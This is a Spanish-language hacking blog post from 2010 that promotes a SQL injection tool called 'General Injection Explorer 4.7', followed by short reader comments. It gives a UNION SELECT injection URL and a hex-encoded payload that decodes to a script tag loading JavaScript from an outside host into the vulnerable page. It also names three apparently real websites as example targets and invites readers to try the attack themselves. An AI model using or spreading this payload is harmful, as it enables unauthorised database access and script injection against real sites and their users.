8 abr. 2010

[General Injection Explorer 4.7] Herramienta para SQL Injection

Bueno... navegando por ahí me encuentro con una de las mejores herramientas de SQL Injection que me ha tocado probar...

Es sin duda una execelente herramienta que vale la pena tener siempre en cuenta, ya que su uso es extremadamente sencillo y no se requiere de ningún tipo de instalación.

Lo único que necesitas es una web vulnerable a SQLi con el formato:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12--

[+] vuln in num/s: |2|3|

Entonces el código GIE 4.7 (General Injection Explorer 4.7) se pone en algún número visible:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(GIE),3,4,5,6,7,8,9,10,11,12--

Código GIE 4.7:
(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e)

Entonces la URL final quedaría así:
http://www.webvulnerable.com/new.php?id=-1+union+select+0,1,(0x3c736372697074207372633d22687474703a2f2f73696e64656c656e2e636c2f61646d696e2f75706c6f6164732f696d616765732f4769452e6a732220747970653d22746578742f6a617661736372697074223e3c2f7363726970743e),3,4,5,6,7,8,9,10,11,12--

Ahora pruebenlo ustedes y disfrútenlo...

[*] Screens:

explorador de bases de datos.

lector de archivos, con Bruteforce.

 
consola de peticiones, en la imagen un ejemplo 
de una query que busca mails en la base de datos.


 
variables del servidor

 
Historial de Inyecciones, para el que quiera 
saber un poco mas sobre el funcionamiento de la GIE


[*] Ejemplos:

SQLi GIE [adegasgalegas.es]
SQLi GIE [rubias19.com]
SQLi GIE [comic-ar.com]

Codigo de fuente de GIE 4.7

Fuente: http://ponymagic.diosdelared.com/

[+] Salu2
[+] ZioneR 

Author & Editor

Ingeniero Civil en Computación (Universidad de Chile FCFM) y Diplomado en Gestión y Evaluación de Proyectos TI (Universidad de Chile FEN). Actualmente trabajo como Project Manager en varios proyectos y como asesor tecnológico para empresas.

4 Notaciones:

  1. :O EXCELENTEEEEE !!!!

    ResponderEliminar
  2. Amigo excelente gracias

    ResponderEliminar
  3. this is amazing.. is there a way i can see that .js file? I'm extremely interested.
    keep up that good work :)

    ResponderEliminar
  4. El host donde se encuentra el GIE se cayó...

    Así que no funciona :(

    [+] Salu2

    ResponderEliminar

Nota: solo los miembros de este blog pueden publicar comentarios.

Labels

0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (25) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (1) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (130) Hack Tips (63) Hacked (6) Hacking (18) Hacking Hardware (5) HashCat (1) Herramientas (121) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (1) Leaks (21) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (193) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (145) Seguridad Web (140) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (17) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (66) Wireless Tools (13) XSS (16) Youtube (1)

 
biz.